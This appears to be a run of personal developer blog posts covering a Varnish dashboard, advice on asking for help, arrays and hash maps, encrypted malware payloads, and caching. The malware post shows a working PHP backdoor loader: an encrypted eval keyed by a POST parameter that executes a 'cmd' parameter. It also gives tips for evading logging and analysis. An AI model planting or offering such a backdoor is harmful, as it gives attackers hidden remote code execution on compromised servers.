Enhanced Varnish Dashboard

I run Varnish on a number of servers, and I don’t always have a full metrics stack (e.g. Graphite/StatsD/collectd) set up. Also, sometimes I just want a real-time dashboard for watching traffic (or my clients do).

I’ve been using Varnish Agent 2 + the ITLinuxCL dashboard, which is lacking to say the least. The dashboard isn’t maintained, is very minimal, and is somewhat broken. So I set out to build my own.

I wanted to make good use of the Varnish Agent API, so I added the ability to purge URLs, view/upload VCLs, view params, view logs, etc. I also added support for multiple Varnish backends, so you can host the dashboard somewhere else and point it at several Varnish instances. That feature is held up until a patch I submitted to vagent to add CORS headers gets merged (it’s pending review).

There are screenshots on GitHub, so check it out: https://github.com/brandonwamboldt/varnish-dashboard

Before asking for help, make sure you understand your tools

I’m writing this blog post in response to Why Rockstar Developers don’t Ask for Help and So you want to be a Developer Rockstar?. Despite the use of the ridiculous term “Rockstar Developer” and quite a lot of humblebragging, I think the author is on to something, but just barely misses the mark.

I wouldn’t say that good developers should never ask for help; that’s craziness. I’d change the wording a bit:

Try not to ask for help if you don’t understand the tools/software that you’re having problems with

What do I mean? If you’re trying to figure out how to rebase your branch in Git, or why PHPUnit isn’t running, or how to fix a particular C error, you’re probably missing some knowledge relevant to the problem (e.g. you don’t understand rebasing or Git’s internal data representation). If you learn more about Git, you’ll gain the understanding to fix the problem, and probably many related problems (or variations of the same one). On the other hand, if you just ask your co-worker for the command to rebase a branch, you still don’t understand what is happening or why it works, so the underlying problem remains. Put in the time to learn your tools, libraries, frameworks, etc.

If people took the time to learn instead of trying to skate by with as little effort as possible, there would be far fewer interruptions in the workplace, far more productive and well-educated developers, and significantly less noise on Stack Overflow.

Of course, this isn’t always the case. Sometimes you reach the point where you’ve spent too much time on a problem and need help getting to the next step. Or maybe you’re so lost you don’t even know where to start (in which case you should ask for pointers, not a complete answer). And you may simply not have time to learn something well enough to continue because of deadlines, but in that case you should definitely follow up afterwards, when you aren’t racing the clock.

When should you ask for help? A common case is when something should be working: you understand the system and what’s going on, but it isn’t behaving the way you’d expect. You aren’t blindly running commands with no understanding of how or why they work. Maybe you’ve overlooked something, or it’s some small thing your co-worker will point out right away. These kinds of problems are fine to get help with.

Likewise, domain-specific knowledge that requires an understanding of the business is typically fine to ask a co-worker about: how do you interface with this heavy-duty crane transmission, what does this scientific shorthand mean, or what are the rules around who can access what content?

I also want to point out that this doesn’t apply to getting feedback, such as asking a co-worker for feedback on your design, approach, or code.

Understanding Arrays

Arrays and hash maps are cornerstones of modern computer programming. It’s almost impossible to write a useful program without them, so it’s critical to understand them when you’re getting started with programming. In this post, I’ll explain arrays and hash maps: how they work, how they differ, and when to use them.

Arrays

Arrays are a numerically indexed collection of items. In dynamically typed languages like PHP, Python, and Ruby, arrays can contain any value. You define an array like this:

my_array = ["orange", "red", "blue"]

Here, we are creating an array named “my_array”. Square brackets ([ and ]) are the most common way of creating arrays in most languages. The array defined above has three string values. We can access the values using their numerical index. Most programming languages use zero-indexed arrays, meaning the first item is at index 0:

print my_array[0] // Prints "orange"
print my_array[1] // Prints "red"
print my_array[2] // Prints "blue"

We can add items to an array using several methods, the simplest of which is just setting the numerical index directly:

my_array[3] = "purple"
print my_array[3] // Prints "purple"

Note: arrays in compiled languages usually have a fixed size, and you must create a new array if you want to add additional items. I won’t really go into that here.

You can iterate over the items in an array in several ways, but the most common is a for loop (or a foreach loop in some languages):

for color in my_array:
    print color

The above code will print:

orange
red
blue
purple

The for loop operates one item at a time, traditionally assigning the item to a variable (color) and then executing the body of the loop (print color) for each item.

Hash Maps

Hash maps, also called hash tables, dictionaries, or associative arrays, are a data structure very similar to arrays. They are a collection of items indexed by a key. Unlike arrays, hash map keys can be strings as well as numbers. Hash maps are traditionally unordered, but some implementations maintain insertion order (JSON objects don’t, for example, while PHP’s associative arrays do).

Many new programmers think hash maps are just arrays as some languages (e.g. PHP and JavaScript) only have hash maps, which they call arrays. Hash maps can function just like normal arrays, albeit less efficiently in most cases.
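
PHP is a good illustration of this: its single “array” type is really an ordered hash map, so the same structure accepts numeric indexes and string keys. A quick PHP sketch:

<?php
$colors = ["orange", "red", "blue"];   // Looks like a plain array
$colors[] = "purple";                  // Appends at the next numeric index (3)
echo $colors[2];                       // Prints "blue"
$colors["favorite"] = "green";         // ...but string keys work on the same structure
echo $colors["favorite"];              // Prints "green"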

Some languages have a different syntax for hash maps than arrays (e.g. Python) and others don’t (PHP). Here is an example of creating a hash map:

my_hashmap = { "name": "Brandon", "age": "22", "country": "Canada" }

This creates a hash map with three keys: name, age, and country. I can add a new key just like I would with an array:

my_hashmap["occupation"] = "Programmer"

And I can iterate over a hash map similarly to an array, but not quite the same:

for key in my_hashmap:
    print "My " + key + " is " + my_hashmap[key]

Here, for every item in the hash map, the key is assigned to the variable key, and I then use that key to look up the value. For example, the first iteration assigns the key “name” to the variable key, so my_hashmap[key] is the same as my_hashmap["name"], which returns “Brandon”.

Arrays of Hash Maps

It’s very common to see an array of objects or an array of arrays, which can be confusing at first. Take the following example:

employees = [
    {"name": "Oliver Queen", "role": "C.E.O."}, 
    {"name": "Felicity Smoak", "role": "IT Support"}, 
    {"name": "John Diggle", "role": "Body Guard"}
]

Now, say you want to print out each employee’s name and role. This is very easy:

for employee in employees:
    print employee["name"] + ", " + employee["role"]

Which outputs:

Oliver Queen, C.E.O.
Felicity Smoak, IT Support
John Diggle, Body Guard

Nested Hash Maps

Nested hash maps are another common occurrence in programming (especially in APIs). Take this example:

person = { "name": { "first": "Brandon", "last": "Wamboldt" } }

To access a nested attribute, you simply chain keys like so:

print person["name"]["first"] // Prints "Brandon"

This works with arrays too:

things = [["purple", "green", "orange"], ["apple", "orange", "banana"]]
print things[0][0] // Prints "purple"
print things[1][2] // Prints "banana"

Encrypted Malware Payloads

While reading an article on the recently discovered hacking group dubbed the Equation Group[1], I stumbled across an interesting concept: encrypted malware payloads. Most server admins will inevitably have the experience of dealing with a compromised system, especially if you host sites running WordPress[2][3], IPB[4], vBulletin[5], Drupal[6], or a host of other systems that tend to exhibit a high number of easily and remotely exploitable vulnerabilities (sometimes in the core software, more frequently in plugins). I’ve dealt with a number of compromised sites, analyzing the PHP that was injected into them.

Typically, what I’ve seen (and what appears to be common) is an obfuscated payload, using base64-encoded strings and the eval() function (which executes a string as PHP code[7]). These are easy to spot (malicious PHP code normally is) and easy to de-obfuscate to determine the purpose of the code. I recently went through that process on a newly acquired client’s site, and discovered that the payload was a spammy backlink page designed to improve SEO for target sites by injecting links whenever the Googlebot requested the page.

It has occurred to me that hackers and spammers would be better off encrypting their payloads in situations like this, but for some reason I almost never see it done. There are three common types of hacks: injecting some sort of control panel that lets the attacker read the file system and run arbitrary commands/code, spammy backlink pages like the one I described above, and “other” hacks like defacing a site. The first two are highly targeted attacks that may be suitable for encrypted payloads. The catch is that the encryption key must be somewhat difficult to determine, so it has to come from outside the code.

In the first case, you could use a random POST parameter to supply the encryption key. POST parameters have the advantage that they are rarely logged. If the code runs on every page, you could simply send a non-suspicious POST request to some arbitrary page (e.g. the home page, or for even less suspicion, a page with a form on it).

For targeted attacks like SEO pages, you could use the user agent as the key. While a user agent can be fairly easy to determine, it does make the analysis more difficult and tedious.

Of course, encrypted payloads stand out just as much as base64-encoded payloads, but at least their purpose remains a secret. Here is an example:

<?php
eval(openssl_decrypt('V1MrPqUg83vX83Hc6qgIYnhXFB3T971/9ZGj6RIYG/8=', 'aes128', $_POST['key'], 0, "0123456789ABCDEF"));

This takes a password from a POST parameter named key. The decoded payload simply runs eval() on the contents of the cmd POST parameter. You could get more sophisticated and fall back to mcrypt if openssl isn’t available, maybe even include a pure PHP library.

Just food for thought.

Basics Of Scaling: Cache Everything

I do a lot of work on websites that need to scale fairly well, but I tend to bring that mentality to every project. Part of scaling is performance: the better your app performs (e.g. the more requests per second it can handle), the cheaper it is to run.

One very easy way to improve your application’s performance is to add caching. If you don’t currently have caching, you’ll probably see a massive benefit, depending on your application’s architecture. There are many different types of caching, with varying degrees of difficulty to implement.

I’ve included some very surface level details on caching in this post. These posts aren’t meant to be comprehensive tutorials, but to make you aware of various techniques used to scale your applications better.

HTTP Accelerators/Reverse Proxies

HTTP accelerators (reverse proxies) such as Varnish tend to be very easy to set up and can give you huge performance improvements if you have a lot of cacheable content (e.g. on a WordPress blog). Varnish is one of my go-to tools for fast and easy scaling. Instead of having Apache or Nginx as your public-facing server, you put Varnish in front: you set Varnish to listen on port 80, and change Apache/Nginx/whatever to listen on an alternate port like 8080.

You configure Varnish with Apache/Nginx as a backend, and it will direct any request that isn’t currently cached there. That’s all you need for a very basic setup, but you’ll likely want to customize Varnish’s caching logic to be a bit more permissive (by default, for example, Varnish won’t cache a page if there are cookies in the request). I’ll leave the detailed setup instructions for another blog post, since it’s a very large topic (you can search for tutorials to get started).

Varnish can be the key to saving your website from crashing during large traffic spikes (like when you get posted to Reddit or another popular site). When properly configured, Varnish can continue serving cached pages even if the backend is offline. Also, Varnish stores its cache in memory and is highly optimized at what it does (for example, it goes out of its way to minimize system calls and the context switching they cause).

Page Caches

Then there are page caching techniques within your application. WordPress, Symfony, and Rails, for example, all have mechanisms to cache the output of pages as static files and serve those, skipping much of the slow part of your application (e.g. database queries). Some systems even let you store page caches in memory instead of on the filesystem, using a built-in mechanism or an external application like memcached.

Page caching techniques vary wildly depending on your application or framework, so I won’t go too deep into it here.

The gist of it is that if a page is filled with content that doesn’t change very frequently and isn’t dynamic on every request, you can typically render it out to a static file and serve that until the content changes. This avoids the cost of database calls and complicated application logic, but it still isn’t free: dynamic languages like Ruby, Python, and PHP carry a lot of per-request overhead, so serving a cached resource from them is at least an order of magnitude slower than serving it from Varnish.
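
To make the idea concrete, here is a minimal sketch of a hand-rolled file-based page cache in PHP. It’s illustrative only: the cache directory, lifetime, and render_page() function are made up, and a real framework’s page cache handles invalidation, cache keys, and headers for you.

<?php
// Sketch of a file-based page cache. Assumes /tmp/page-cache exists and is
// writable, and that the page's output depends only on the URL.
$cacheFile = '/tmp/page-cache/' . md5($_SERVER['REQUEST_URI']) . '.html';
$maxAge    = 300; // seconds

if (is_file($cacheFile) && (time() - filemtime($cacheFile)) < $maxAge) {
    readfile($cacheFile); // Cache hit: serve the static copy and stop
    exit;
}

ob_start();             // Cache miss: render the page normally
render_page();          // Hypothetical function that does the real work
$html = ob_get_clean();

file_put_contents($cacheFile, $html); // Save it for the next request
echo $html;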

Also worth noting: many systems, including Varnish, support Edge Side Includes (and, similarly, there are Server Side Includes). If the majority of your page is static but there are one or two dynamic parts (e.g. user details), you can statically cache the page and use an ESI or SSI to pull in the dynamic parts when the page is served. This tends to perform better than re-rendering the entire page (again, it varies based on your individual application).

Another technique to improve the cacheability of your pages, for both page caching and reverse proxies, is to use AJAX to fill in dynamic data after the page loads. One of my websites has every page cached, so I use AJAX to populate user data: once the page loads, I make a request to a JSON endpoint (which is not cached) that returns the current user’s info, and then use JavaScript to place it in the page.
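
The uncached endpoint side of that can be tiny. Here is a hedged PHP sketch (the file name and session keys are hypothetical); the important part is the Cache-Control header, which keeps browsers, and a Varnish config that still respects Cache-Control, from caching the response:

<?php
// user-info.php: returns the current user's details as JSON.
session_start();

header('Content-Type: application/json');
header('Cache-Control: private, no-store, max-age=0');

echo json_encode([
    'logged_in' => isset($_SESSION['user_name']),
    'name'      => isset($_SESSION['user_name']) ? $_SESSION['user_name'] : null,
]);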

In-Memory Caching

Another very common technique is to use an in-memory data store like Redis or Memcached, often located on the same machine as the webserver (though not always). You use these in-memory stores to temporarily hold data that is slow to compute. In your application, you check the memory store first; if the data isn’t there, you fall back to the real code and, after computing the result, add it to the store.

Typical uses include caching database calls (say you have a settings table that you fetch on every request; it’s far faster to keep it in memory than to hit the database every time) and caching slow computations. You shouldn’t use in-memory data stores for any information you want to keep, as they are volatile storage (nothing persists after a restart).
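
With the PHP Memcached extension, the check-the-store-first pattern for that settings example might look roughly like this (the key name, expiry, and load_settings_from_db() helper are invented for the sketch):

<?php
// Cache-aside lookup for a rarely changing settings table.
$cache = new Memcached();
$cache->addServer('127.0.0.1', 11211);

$settings = $cache->get('app:settings');

if ($settings === false) {                        // Treat false as a cache miss
    $settings = load_settings_from_db();          // Hypothetical slow DB query
    $cache->set('app:settings', $settings, 300);  // Keep it for 5 minutes
}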

Some programming languages also support shared memory built right into the language. These systems allow you to cache data in a shared block of memory and access it from any process. However, I recommend using memcached or something similar instead, as they tend to be more powerful and well optimized.
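
For example, PHP’s APCu extension exposes a small shared-memory cache that the PHP worker processes on one server can all read and write. A tiny sketch (the key, TTL, and build_expensive_report() function are arbitrary):

<?php
// APCu: shared-memory cache local to this web server.
$report = apcu_fetch('report:daily', $found);

if (!$found) {
    $report = build_expensive_report();        // Hypothetical slow computation
    apcu_store('report:daily', $report, 60);   // Keep it for 60 seconds
}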

Cache Busting

Cache busting is the act of clearing, deleting, or expiring a cached item. It’s commonly done when a resource changes (for example, my blog busts the Varnish cache whenever I publish a new post), and it’s a common source of confusion when caching is first introduced (“why can’t I see my changes?”). Most frameworks have libraries for dealing with this, but if you’re going with a homegrown approach, it’s important to plan for it. You may want to hook into your models to clear the relevant caches, for example.
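
A homegrown version of that hook might look something like the PHP sketch below, which busts both an object-cache entry and Varnish’s copy of the page. It assumes your VCL has been set up to accept PURGE requests, and the function and key names are invented:

<?php
// Called whenever a post is saved or updated.
function bust_post_caches($postId, $postUrl)
{
    // Drop the object-cache entry for this post.
    $cache = new Memcached();
    $cache->addServer('127.0.0.1', 11211);
    $cache->delete('post:' . $postId);

    // Ask Varnish to evict its cached copy of the page
    // (only works if vcl_recv handles the PURGE method).
    $ch = curl_init($postUrl);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'PURGE');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_exec($ch);
    curl_close($ch);
}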

Closing Notes

Caching is used heavily by every large website (Facebook, Google, Twitter, etc.). Facebook operates one of the largest memcached clusters in the world, consisting of hundreds of terabytes of RAM[1][2]. These websites save millions of dollars a year in server resources by employing a multitude of caching techniques.

Another lesson that is often learned the hard way: caching can be a nightmare if you don’t design your application with it in mind from the very beginning. Adding caching after the fact will cause many issues (e.g. resources not being busted automatically when they change). Naming is the other very important part of caching; it pays off to think of a good, scalable key-naming scheme before you get started.

If you haven’t already read them, I’d recommend checking out my other blog posts on the basics of scaling: